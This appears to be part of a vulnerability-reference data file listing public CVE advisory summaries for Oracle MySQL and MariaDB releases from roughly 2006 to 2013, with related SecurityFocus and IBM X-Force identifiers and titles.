14216| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
14217| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14218| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
14219| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14220| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
14221| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14222| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
14223| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
14224| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
14225| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
14226| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
14227| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
14228| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
14229| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
14230| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
14231| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
14232| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
14233| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
14234| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14235| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
14236| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
14237| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
14238| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
14239| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
14240| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
14241| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
14242| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
14243| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
14244| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
14245| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14246| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
14247| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
14248| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
14249| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14250| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
14251| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
14252| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
14253| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14254| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
14255| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
14256| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
14257| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14258| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14259| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14260| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
14261| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14262| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14263| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
14264| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
14265| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
14266| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
14267| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14268| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
14269| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
14270| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
14271| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
14272| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
14273| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
14274| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
14275| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14276| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
14277| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
14278| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14279| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
14280| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
14281| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
14282| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
14283| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
14284| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
14285| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
14286| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
14287| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
14288| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
14289| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
14290| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
14291| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
14292| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
14293| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
14294| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
14295| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
14296| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
14297| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
14298| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
14299| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
14300| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
14301| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
14302| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
14303| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
14304| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
14305| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
14306| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
14307| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
14308| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
14309| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
14310| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
14311| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
14312| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
14313| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
14314| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
14315| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
14316| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
14317| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
14318| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
14319| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
14320| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
14321| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
14322| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
14323| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
14324| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
14325| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
14326| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
14327| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
14328| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
14329| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
14330| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
14331| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
14332| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
14333| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
14334|
14335| SecurityFocus - https://www.securityfocus.com/bid/:
14336| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
14337| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
14338| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
14339| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
14340| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
14341| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
14342| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
14343| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
14344|
14345| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14346| [85724] Oracle MySQL Server XA Transactions denial of service
14347| [85723] Oracle MySQL Server Server Replication denial of service
14348| [85722] Oracle MySQL Server InnoDB denial of service
14349| [85721] Oracle MySQL Server Server Privileges unspecified
14350| [85720] Oracle MySQL Server Server Partition denial of service
14351| [85719] Oracle MySQL Server Server Parser denial of service
14352| [85718] Oracle MySQL Server Server Options denial of service
14353| [85717] Oracle MySQL Server Server Options denial of service
14354| [85716] Oracle MySQL Server Server Optimizer denial of service
14355| [85715] Oracle MySQL Server Server Optimizer denial of service
14356| [85714] Oracle MySQL Server Prepared Statements denial of service
14357| [85713] Oracle MySQL Server InnoDB denial of service
14358| [85712] Oracle MySQL Server Full Text Search denial of service
14359| [85711] Oracle MySQL Server Data Manipulation Language denial of service
14360| [85710] Oracle MySQL Server Data Manipulation Language denial of service
14361| [85709] Oracle MySQL Server Audit Log unspecified
14362| [85708] Oracle MySQL Server MemCached unspecified
14363| [84846] Debian mysql-server package information disclosure
14364| [84375] Wireshark MySQL dissector denial of service
14365| [83554] Oracle MySQL Server Server Partition denial of service
14366| [83553] Oracle MySQL Server Server Locking denial of service
